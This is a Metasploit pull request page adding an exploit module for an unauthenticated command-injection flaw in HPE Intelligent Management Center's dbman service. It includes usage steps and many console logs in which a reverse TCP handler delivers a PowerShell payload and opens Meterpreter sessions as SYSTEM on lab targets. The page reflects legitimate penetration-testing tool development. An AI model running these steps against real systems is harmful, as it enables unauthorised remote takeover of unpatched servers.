Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add HPE iMC dbman RestartDB Unauthenticated RCE exploit #9376

Merged
merged 2 commits into from Jan 9, 2018

Conversation

@bcoles
Copy link
Contributor

bcoles commented Jan 5, 2018

Add HPE iMC dbman RestartDB Unauthenticated RCE exploit

    This module exploits a remote command execution vulnerablity in
    Hewlett Packard Enterprise Intelligent Management Center before
    version 7.3 E0504P04.

    The dbman service allows unauthenticated remote users to restart
    a user-specified database instance (OpCode 10008), however the
    instance ID is not sanitized, allowing execution of arbitrary
    operating system commands as SYSTEM. This service listens on
    TCP port 2810 by default.

    This module has been tested successfully on iMC PLAT v7.2 (E0403)
    on Windows 7 SP1 (EN).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce
  • set RHOST <IP>
  • run
  • Verify you get a session

Example Output

msf > use exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce 
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > check
[*] 172.16.191.166:2810 The target service is running, but could not be validated.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > set verbose true
verbose => true
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.191.181:4444 
[*] 172.16.191.166:2810 - Powershell command length: 6091
[*] 172.16.191.166:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.191.166
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.166:55316) at 2018-01-05 03:23:55 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-SGBSD5TQUTQ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
@bcoles bcoles added module docs labels Jan 5, 2018
@wchen-r7 wchen-r7 self-assigned this Jan 8, 2018
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 8, 2018

Hi @bcoles, it looks like HP is no longer hosting the vulnerable version of the software:

msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.146:2810 - Sending payload (6135 bytes)...
[*] Exploit completed, but no session was created.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > check
[*] 172.16.249.146:2810 The target service is running, but could not be validated.
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > 

I actually got version 7.3 (E0506).

I will need to look around and see if I have one that's vulnerable.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 8, 2018

@wchen-r7 the link in the module documentation should allow you to download 7.2 E0403.

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 8, 2018

I am dumb. I should have read it more carefully. Thank you!

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Jan 8, 2018

@wchen-r7 It's worth noting that you may have to run the module a couple of times. I get a fail rate of about 1 in 10.

It's usually fairly reliable and doesn't crash the service, so I used ExcellentRanking.

I thought the occasional failures were due to bad characters, but the payload is encoded and the exact same payload will fail one time but work another.

Similarly, while the exploit uses randomized junk strings of randomized length, these do not appear to be the cause of failure. Running the module with static strings of static length will still result in occasional failure.

The generated packets are well formed. During development, I noticed that malformed packets, including packets of an incorrect length, will cause the server to reject the connection. The exploit is stable, and the server never rejects the connection, indicating the packets are in fact well formed.

The exploit is fast and easy to re-execute. As such, I consider a 10% failure rate acceptable. I'm inclined to think the issue is due to the dbman service.

The same is true for the other iMC exploit #9377

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 9, 2018

@bcoles Good to know. Thanks!

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 9, 2018

@bcoles I tested the exploit 11 times in a row, and it never failed on me. Here's the log:

msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.148:50072) at 2018-01-09 13:13:22 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 2 opened (172.16.249.1:4444 -> 172.16.249.148:50078) at 2018-01-09 13:13:53 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6111 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 3 opened (172.16.249.1:4444 -> 172.16.249.148:50081) at 2018-01-09 13:13:56 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 3 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6079 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 4 opened (172.16.249.1:4444 -> 172.16.249.148:50082) at 2018-01-09 13:13:59 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 5 opened (172.16.249.1:4444 -> 172.16.249.148:50083) at 2018-01-09 13:14:02 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6111 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 6 opened (172.16.249.1:4444 -> 172.16.249.148:50085) at 2018-01-09 13:14:05 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 6 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6123 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 7 opened (172.16.249.1:4444 -> 172.16.249.148:50087) at 2018-01-09 13:14:08 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 7 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6123 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 8 opened (172.16.249.1:4444 -> 172.16.249.148:50088) at 2018-01-09 13:14:11 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.249.148 - Meterpreter session 8 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 9 opened (172.16.249.1:4444 -> 172.16.249.148:50089) at 2018-01-09 13:14:13 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 9 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6103 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 10 opened (172.16.249.1:4444 -> 172.16.249.148:50091) at 2018-01-09 13:14:16 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 10 closed.  Reason: User exit
msf exploit(windows/misc/hp_imc_dbman_restartdb_unauth_rce) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] 172.16.249.148:2810 - Sending payload (6091 bytes)...
[*] Sending stage (179779 bytes) to 172.16.249.148
[*] Meterpreter session 11 opened (172.16.249.1:4444 -> 172.16.249.148:50093) at 2018-01-09 13:14:19 -0600

meterpreter > exit

[*] 172.16.249.148 - Meterpreter session 11 closed.  Reason: User exit
@wchen-r7 wchen-r7 merged commit 9ec17bd into rapid7:master Jan 9, 2018
2 checks passed
2 checks passed
Metasploit Automation - Test Execution Successfully ran `autoPayloadTest.py`.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
wchen-r7 added a commit that referenced this pull request Jan 9, 2018
Land #9376
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jan 9, 2018

Release Notes

This module exploits a remote command execution vulnerablity in HP Enterprise Intelligent Management Center before version 7.3. The dbman service allows unauthenticated remote users to restart a user-specified database instance (OpCode 10008), however the instance ID is not sanitized, allowing execution of arbitrary operating system commands as SYSTEM.

@bcoles bcoles deleted the bcoles:hp_imc_dbman_restartdb_unauth_rce branch Jan 10, 2018
@tdoan-r7 tdoan-r7 added the rn-exploit label Jan 25, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

None yet

3 participants
You can’t perform that action at this time.